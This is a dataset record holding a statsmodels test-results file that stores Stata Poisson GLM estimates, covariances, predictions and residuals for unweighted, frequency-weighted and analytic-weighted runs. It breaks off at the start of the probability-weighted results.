hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
67658b1b18cce3f2aa9925847c342d2185f76e2d
| 105,906
|
py
|
Python
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 15
|
2015-03-03T09:47:42.000Z
|
2022-01-05T18:28:31.000Z
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 7
|
2015-11-20T08:33:04.000Z
|
2020-07-24T19:34:39.000Z
|
statsmodels/genmod/tests/results/results_glm_poisson_weights.py
|
nikhase/statsmodels
|
e1822d4513f442002816bb898ca5794785f35c32
|
[
"BSD-3-Clause"
] | 14
|
2015-01-06T22:08:34.000Z
|
2021-01-01T16:33:23.000Z
|
import numpy as np
# Stata `glm` results for the UNWEIGHTED Poisson run (see `cmdline` below).
# Scalar statistics as stored in Stata's e() after estimation; exported
# verbatim for use as expected values in regression tests.
est = dict(
deviance = 18.59164098607571,
dispers = 1.859164098607571,
deviance_s = 18.59164098607571,
dispers_s = 1.859164098607571,
deviance_p = 24.75374834715614,
dispers_p = 2.475374834715614,
deviance_ps = 24.75374834715614,
dispers_ps = 2.475374834715614,
bic = -9.740492454486454,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -31.92732830809848,
chi2 = 128.8021169250575,
p = 2.29729497374e-25,
rc = 0,
aic = 4.579685683305704,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree, family(poisson)",
)
# Parameter table: one row per regressor (rownames below), columns named in
# params_table_colnames (b, se, z, pvalue, ll, ul, df, crit, eform).
params_table = np.array([
.00026110166569, .00005187148786, 5.0336259178483, 4.812884279e-07,
.00015943541766, .00036276791372, np.nan, 1.9599639845401,
0, .07781804809828, .07940260798777, .98004398180811,
.32706440886796, -.0778082038363, .23344430003287, np.nan,
1.9599639845401, 0, -.09493110013466, .02291930335216,
-4.1419714498302, .00003443332141, -.13985210925565, -.05001009101367,
np.nan, 1.9599639845401, 0, .29693462055586,
.43751760764129, .67868038993144, .49734039404176, -.5605841330232,
1.1544533741349, np.nan, 1.9599639845401, 0,
2.3011832004524, .42838381728481, 5.3717790159251, 7.796361708e-08,
1.4615663470144, 3.1408000538904, np.nan, 1.9599639845401,
0, -18.722067603077, 4.2839791307242, -4.3702518223781,
.00001241033322, -27.118512409818, -10.325622796337, np.nan,
1.9599639845401, 0, -6.8014789919532, 4.146873025502,
-1.6401464308471, .10097472438129, -14.929200770398, 1.3262427864914,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 covariance matrix of the parameter estimates (OIM, per `vce` above).
cov = np.array([
2.690651253e-09, 1.942168909e-06, 9.445812833e-08, 4.703695025e-06,
-6.082922480e-06, -.00008108248895, -.00013492774575, 1.942168909e-06,
.00630477415526, .00017467012687, .00328093520848, -.01768604570302,
.11117887243846, -.19441636422025, 9.445812833e-08, .00017467012687,
.00052529446615, -.00313545508833, -.00516707569472, -.03253594627601,
.01688876616272, 4.703695025e-06, .00328093520848, -.00313545508833,
.19142165699616, -.00179497953339, .30391667530759, -1.4489146451821,
-6.082922480e-06, -.01768604570302, -.00516707569472, -.00179497953339,
.18351269491151, .3016848477378, .36484063612427, -.00008108248895,
.11117887243846, -.03253594627601, .30391667530759, .3016848477378,
18.352477192481, -4.0741043266703, -.00013492774575, -.19441636422025,
.01688876616272, -1.4489146451821, .36484063612427, -4.0741043266703,
17.196555889636]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria row (N, ll0, ll, df, AIC, BIC); ll0 not reported.
infocrit = np.array([
17, np.nan, -31.927328308098, 7,
77.854656616197, 83.68715002459])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions, 17 rows x 3 columns (see colnames below).
predicted = np.array([
35.226364135742, .16681243479252, .98022246360779, 8.1965742111206,
.33106967806816, .89840310811996, 1.3118965625763, .29945519566536,
.11764223873615, 3.6862981319427, .35516858100891, .46500706672668,
2.0823004245758, .3434439599514, .24561515450478, 1.0650315284729,
.62310123443604, .41350400447845, 1.9260421991348, .40797635912895,
.32057955861092, 2.4171404838562, .36215576529503, .31702440977097,
1.8473218679428, .3869916498661, .27665960788727, 2.8643238544464,
.43869277834892, .55124300718307, 3.1211984157562, .44224792718887,
.61045408248901, 3.338207244873, .42789322137833, .61120104789734,
2.5269968509674, .42458593845367, .45554983615875, .89725440740585,
.59187793731689, .31432569026947, .97933322191238, .37813624739647,
.14003194868565, .53462094068527, .38791963458061, .08045063912868,
1.9790935516357, .31954729557037, .20208616554737]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Per-observation residuals, 17 rows x 6 residual flavors (colnames below).
resids = np.array([
1.773634314537, 1.773634314537, .29638093709946, .29637759923935,
.2988341152668, .05034962296486, .80342543125153, .80342543125153,
.27623143792152, .27622014284134, .28062695264816, .09801965206861,
4.6881031990051, 4.6881031990051, 3.0157172679901, 2.977787733078,
4.0930528640747, 3.5735311508179, .31370183825493, .31370183825493,
.1611547768116, .16114975512028, .16338862478733, .08509942144156,
.91769951581955, .91769951581955, .59656941890717, .59618371725082,
.63595855236053, .44071426987648, .9349684715271, .9349684715271,
.80822360515594, .80661898851395, .90597397089005, .87787866592407,
.07395775616169, .07395775616169, .05295527353883, .05295492336154,
.05329062789679, .03839882463217, -.41714036464691, -.41714036464691,
-.27668312191963, -.27663832902908, -.2683065533638, -.17257598042488,
-.84732186794281, -.84732186794281, -.68459099531174, -.68349820375443,
-.6234148144722, -.458675801754, -1.8643238544464, -1.8643238544464,
-1.2799508571625, -1.274356007576, -1.1015654802322, -.65087747573853,
-2.1211984157562, -2.1211984157562, -1.4092296361923, -1.4021278619766,
-1.2006615400314, -.67961025238037, -2.338207244873, -2.338207244873,
-1.5136297941208, -1.5051733255386, -1.2797535657883, -.70043802261353,
-1.5269968509674, -1.5269968509674, -1.0992211103439, -1.0954134464264,
-.9605849981308, -.60427337884903, .10274560004473, .10274560004473,
.10649761557579, .1064917370677, .10846894979477, .11451110988855,
.02066676132381, .02066676132381, .02081091701984, .02081087417901,
.02088368684053, .02110289037228, .46537905931473, .46537905931473,
.56824368238449, .56713002920151, .63647866249084, .87048417329788,
-.97909361124039, -.97909361124039, -.77151334285736, -.77000600099564,
-.69597083330154, -.49471819400787]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
class Bunch(dict):
    """Dict with attribute access, used to bundle one estimation run.

    All keyword arguments become both dict items and attributes
    (``__dict__`` is bound to the dict itself).  The first four columns
    of the required ``params_table`` keyword are additionally exposed
    under the names ``params``, ``bse``, ``tvalues`` and ``pvalues``.

    NOTE(review): the class body had lost its leading indentation in
    this copy (a syntax error as written); the original structure is
    restored here with no behavioral change.
    """

    def __init__(self, **kw):
        dict.__init__(self, kw)
        # Items and attributes share one storage: self['x'] is self.x.
        self.__dict__ = self
        # Alias the first four params_table columns under the
        # conventional statsmodels result names.  Requires a
        # ``params_table`` keyword supporting 2-D slicing (numpy array).
        for i, att in enumerate(['params', 'bse', 'tvalues', 'pvalues']):
            self[att] = self.params_table[:, i]
# Bundle the unweighted-run arrays and e() scalars into one attribute-dict;
# Bunch.__init__ also derives params/bse/tvalues/pvalues from params_table.
results_poisson_none_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
# Stata `glm` results for the FREQUENCY-WEIGHT run ([fweight=fweight],
# see `cmdline` below); note N = 33 (weighted observation count).
# The module-level est/params_table/... names are intentionally rebound
# per run and captured into a Bunch at the end of each section.
est = dict(
deviance = 23.34969514421719,
dispers = .8980651978545075,
deviance_s = 23.34969514421719,
dispers_s = .8980651978545075,
deviance_p = 30.06164170990202,
dispers_p = 1.156216988842385,
deviance_ps = 30.06164170990202,
dispers_ps = 1.156216988842385,
bic = -67.5595014539113,
nbml = 0,
N = 33,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -52.96941847346162,
chi2 = 183.6836771894393,
p = 5.59891844113e-37,
rc = 0,
aic = 3.634510210512826,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 26,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "fweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [fweight=fweight], family(poisson)",
)
# Parameter table, 7 regressors x 9 statistics (colnames below).
params_table = np.array([
.00025343868829, .00004015414514, 6.3116444744157, 2.760858933e-10,
.00017473800999, .00033213936659, np.nan, 1.9599639845401,
0, .09081422305585, .06472607217881, 1.4030547505642,
.16060051303473, -.03604654727537, .21767499338706, np.nan,
1.9599639845401, 0, -.09416451429381, .01795769655821,
-5.2436855689475, 1.574003474e-07, -.12936095279319, -.05896807579442,
np.nan, 1.9599639845401, 0, .27652273809506,
.38626128010796, .7158955669017, .47405583598111, -.48053545953887,
1.033580935729, np.nan, 1.9599639845401, 0,
2.239890838384, .36339399714255, 6.1638080320445, 7.101602988e-10,
1.5276516917866, 2.9521299849815, np.nan, 1.9599639845401,
0, -18.842583191417, 3.736940161486, -5.0422491067996,
4.600917913e-07, -26.16685132031, -11.518315062523, np.nan,
1.9599639845401, 0, -6.5630017977416, 3.2352486362722,
-2.0285927097411, .04249979172538, -12.903972605867, -.22203098961573,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 parameter covariance matrix (OIM, per `vce` above).
cov = np.array([
1.612355372e-09, 1.270985149e-06, 8.789752394e-08, -1.636449642e-07,
-3.213686689e-06, -.00005643188411, -.00006199883309, 1.270985149e-06,
.0041894644197, .00016567874308, -.00066453618021, -.00943379587945,
.07218307550995, -.11262571631082, 8.789752394e-08, .00016567874308,
.00032247886568, -.00355795369216, -.00391377556228, -.01880905186772,
.01900717143416, -1.636449642e-07, -.00066453618021, -.00355795369216,
.14919777651064, .02481983169552, .26952997380446, -.95915288407306,
-3.213686689e-06, -.00943379587945, -.00391377556228, .02481983169552,
.13205519715924, .44364186152042, -.0298149336078, -.00005643188411,
.07218307550995, -.01880905186772, .26952997380446, .44364186152042,
13.964721770527, -3.6510403528048, -.00006199883309, -.11262571631082,
.01900717143416, -.95915288407306, -.0298149336078, -3.6510403528048,
10.466833738501]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria row (N, ll0, ll, df, AIC, BIC); ll0 not reported.
infocrit = np.array([
33, np.nan, -52.969418473462, 7,
119.93883694692, 130.41438987719])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions, 17 rows x 3 columns (colnames below).
predicted = np.array([
34.815238952637, .16658315062523, .96612107753754, 7.3026847839355,
.32757967710495, .78363972902298, 1.2540435791016, .26076200604439,
.08527097851038, 3.9734709262848, .24942673742771, .24720433354378,
2.0739872455597, .24682784080505, .12635557353497, 1.1471545696259,
.45427960157394, .23673823475838, 1.7763512134552, .27608770132065,
.13540133833885, 2.2698366641998, .25641229748726, .1492355465889,
1.6349502801895, .27634221315384, .12485299259424, 2.7504913806915,
.39550569653511, .43024495244026, 2.862185716629, .39729079604149,
.45176732540131, 3.5617923736572, .39150056242943, .54592549800873,
2.6135795116425, .29556328058243, .22831618785858, .775799036026,
.40655690431595, .12823067605495, .93375068902969, .29390665888786,
.08065843582153, .56681954860687, .28863781690598, .04722274839878,
1.8914022445679, .21889741718769, .09062857925892]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Per-observation residuals, 17 rows x 6 residual flavors (colnames below).
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle the fweight-run arrays and scalars into one attribute-dict.
results_poisson_fweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
# Stata `glm` results for the ANALYTIC-WEIGHT run ([aweight=fweight],
# see `cmdline` below); N stays 17 with aweights.  `wexp` is Stata's
# stored weight expression string, kept verbatim.
est = dict(
deviance = 12.02863083186947,
dispers = 1.202863083186947,
deviance_s = 12.02863083186947,
dispers_s = 1.202863083186947,
deviance_p = 15.48630027479802,
dispers_p = 1.548630027479802,
deviance_ps = 15.48630027479802,
dispers_ps = 1.548630027479802,
bic = -16.30350260869269,
nbml = 0,
N = 17,
ic = 3,
k = 7,
k_eq = 1,
k_dv = 1,
converged = 1,
k_autoCns = 0,
ll = -27.28727618329841,
chi2 = 94.62492461274286,
p = 3.30927661191e-18,
rc = 0,
aic = 4.033797198035106,
rank = 7,
canonical = 1,
power = 0,
df_m = 6,
df = 10,
vf = 1,
phi = 1,
k_eq_model = 0,
properties = "b V",
depvar = "executions",
which = "max",
technique = "nr",
singularHmethod = "m-marquardt",
ml_method = "e2",
crittype = "log likelihood",
user = "glim_lf",
title = "Generalized linear models",
opt = "moptimize",
chi2type = "Wald",
wtype = "aweight",
wexp = "= fweight",
link = "glim_l03",
varfunc = "glim_v3",
m = "1",
a = "1",
oim = "oim",
opt1 = "ML",
varfuncf = "u",
varfunct = "Poisson",
linkf = "ln(u)",
linkt = "Log",
vce = "oim",
vcetype = "OIM",
hac_lag = "15",
marginsok = "default",
marginsnotok = "stdp Anscombe Cooksd Deviance Hat Likelihood Pearson Response Score Working ADJusted STAndardized STUdentized MODified",
predict = "glim_p",
cmd = "glm",
cmdline = "glm executions income perpoverty perblack LN_VC100k96 south degree [aweight=fweight], family(poisson)",
)
# Parameter table, 7 regressors x 9 statistics (colnames below).
params_table = np.array([
.00025343868829, .00005594520811, 4.5301232557793, 5.894928560e-06,
.00014378809529, .00036308928129, np.nan, 1.9599639845401,
0, .09081422305585, .09018031800722, 1.0070293059798,
.31392069129295, -.08593595235267, .26756439846436, np.nan,
1.9599639845401, 0, -.09416451429381, .02501975991718,
-3.7636058301716, .00016748080115, -.14320234263332, -.04512668595429,
np.nan, 1.9599639845401, 0, .27652273809507,
.53816281293549, .51382728692594, .60737274844619, -.77825699307725,
1.3313024692674, np.nan, 1.9599639845401, 0,
2.239890838384, .50630271729905, 4.424015044464, 9.688326910e-06,
1.2475557472031, 3.2322259295649, np.nan, 1.9599639845401,
0, -18.842583191417, 5.2065333302747, -3.6190267105084,
.00029571311817, -29.047201003062, -8.6379653797707, np.nan,
1.9599639845401, 0, -6.5630017977417, 4.5075460479893,
-1.4560032727052, .14539171490364, -15.397629710457, 2.2716261149733,
np.nan, 1.9599639845401, 0]).reshape(7,9)
params_table_colnames = 'b se z pvalue ll ul df crit eform'.split()
params_table_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# 7x7 parameter covariance matrix (OIM, per `vce` above).
cov = np.array([
3.129866310e-09, 2.467206465e-06, 1.706246053e-07, -3.176637541e-07,
-6.238332985e-06, -.00010954424563, -.000120350676, 2.467206465e-06,
.00813248975588, .00032161167774, -.00128998199687, -.01831266258952,
.14012008775466, -.21862639048575, 1.706246053e-07, .00032161167774,
.00062598838631, -.00690661599067, -.00759732903266, -.03651168891971,
.03689627396044, -3.176637541e-07, -.00128998199687, -.00690661599067,
.28961921322663, .04817967329131, .52320524326798, -1.8618850102603,
-6.238332985e-06, -.01831266258952, -.00759732903266, .04817967329131,
.2563424415444, .86118714295143, -.05787604759173, -.00010954424563,
.14012008775466, -.03651168891971, .52320524326798, .86118714295143,
27.107989319261, -7.0873136260377, -.000120350676, -.21862639048575,
.03689627396044, -1.8618850102603, -.05787604759173, -7.0873136260377,
20.317971374744]).reshape(7,7)
cov_colnames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
cov_rownames = 'income perpoverty perblack LN_VC100k96 south degree _cons'.split()
# Information criteria row (N, ll0, ll, df, AIC, BIC); ll0 not reported.
infocrit = np.array([
17, np.nan, -27.287276183298, 7,
68.574552366597, 74.40704577499])
infocrit_colnames = 'N ll0 ll df AIC BIC'.split()
infocrit_rownames = '.'.split()
# Per-observation predictions, 17 rows x 3 columns (colnames below).
predicted = np.array([
34.815238952637, .23209382593632, 1.8754115104675, 7.3026847839355,
.45640400052071, 1.521183013916, 1.2540435791016, .36330956220627,
.16552601754665, 3.9734709262848, .34751656651497, .47986721992493,
2.0739872455597, .34389564394951, .2452784627676, 1.1471545696259,
.63293009996414, .45955070853233, 1.7763512134552, .38466224074364,
.2628378868103, 2.2698366641998, .35724925994873, .28969252109528,
1.6349502801895, .38501682877541, .24236169457436, 2.7504913806915,
.55104273557663, .83518141508102, 2.862185716629, .55352979898453,
.87696009874344, 3.5617923736572, .54546248912811, 1.0597376823425,
2.6135795116425, .41179683804512, .44320201873779, .775799036026,
.5664399266243, .24891836941242, .93375068902969, .40948873758316,
.15657225251198, .56681954860687, .40214782953262, .09166768193245,
1.8914022445679, .30498126149178, .17592607438564]).reshape(17,3)
predicted_colnames = 'predict_mu predict_linpred_std predict_hat'.split()
predicted_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Per-observation residuals, 17 rows x 6 residual flavors (colnames below).
resids = np.array([
2.1847612857819, 2.1847612857819, .36650228500366, .36649596691132,
.3702706694603, .06275302171707, 1.6973150968552, 1.6973150968552,
.60597640275955, .60585051774979, .62808901071548, .23242343962193,
4.7459564208984, 4.7459564208984, 3.0897438526154, 3.0483965873718,
4.2380628585815, 3.7845225334167, .02652905881405, .02652905881405,
.01329397037625, .01329396758229, .01330873556435, .00667654490098,
.92601269483566, .92601269483566, .60273587703705, .60233747959137,
.64300429821014, .44648909568787, .8528453707695, .8528453707695,
.72065913677216, .71955502033234, .7962681055069, .7434441447258,
.22364875674248, .22364875674248, .16446639597416, .16445553302765,
.16780391335487, .12590345740318, -.26983660459518, -.26983660459518,
-.1828535348177, -.18284019827843, -.1791032999754, -.11887931078672,
-.63495022058487, -.63495022058487, -.53598040342331, -.53542107343674,
-.49657794833183, -.38836058974266, -1.7504912614822, -1.7504912614822,
-1.2204585075378, -1.2154930830002, -1.0554916858673, -.63642859458923,
-1.862185716629, -1.862185716629, -1.2788465023041, -1.2732635736465,
-1.1007128953934, -.65061664581299, -2.5617923736572, -2.5617923736572,
-1.617108464241, -1.6071890592575, -1.3574055433273, -.71924245357513,
-1.6135795116425, -1.6135795116425, -1.1469231843948, -1.1426799297333,
-.99809640645981, -.61738300323486, .22420094907284, .22420094907284,
.24363535642624, .24356025457382, .25454398989677, .28899359703064,
.06624934077263, .06624934077263, .06777309626341, .06777160614729,
.06855925172567, .07094971090555, .43318045139313, .43318045139313,
.51954871416092, .51871728897095, .57536894083023, .76422989368439,
-.89140218496323, -.89140218496323, -.7140833735466, -.7128586769104,
-.64815932512283, -.47129172086716]).reshape(17,6)
resids_colnames = 'score_factor resid_response resid_anscombe resid_deviance resid_pearson resid_working'.split()
resids_rownames = 'r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 r16 r17'.split()
# Bundle the aweight-run arrays and scalars into one attribute-dict.
results_poisson_aweight_nonrobust = Bunch(
params_table=params_table,
params_table_colnames=params_table_colnames,
params_table_rownames=params_table_rownames,
cov=cov,
cov_colnames=cov_colnames,
cov_rownames=cov_rownames,
infocrit=infocrit,
infocrit_colnames=infocrit_colnames,
infocrit_rownames=infocrit_rownames,
predicted=predicted,
predicted_colnames=predicted_colnames,
predicted_rownames=predicted_rownames,
resids=resids,
resids_colnames=resids_colnames,
resids_rownames=resids_rownames,
**est
)
# Stata `glm` results for the PROBABILITY-WEIGHT run ([pweight=fweight],
# see `cmdline` below).  With pweights Stata reports robust standard
# errors (`vcetype` = "Robust") and a log PSEUDOlikelihood; note this
# est dict has no `vce` key, unlike the runs above.
est = dict(
deviance = 23.34969514421719,
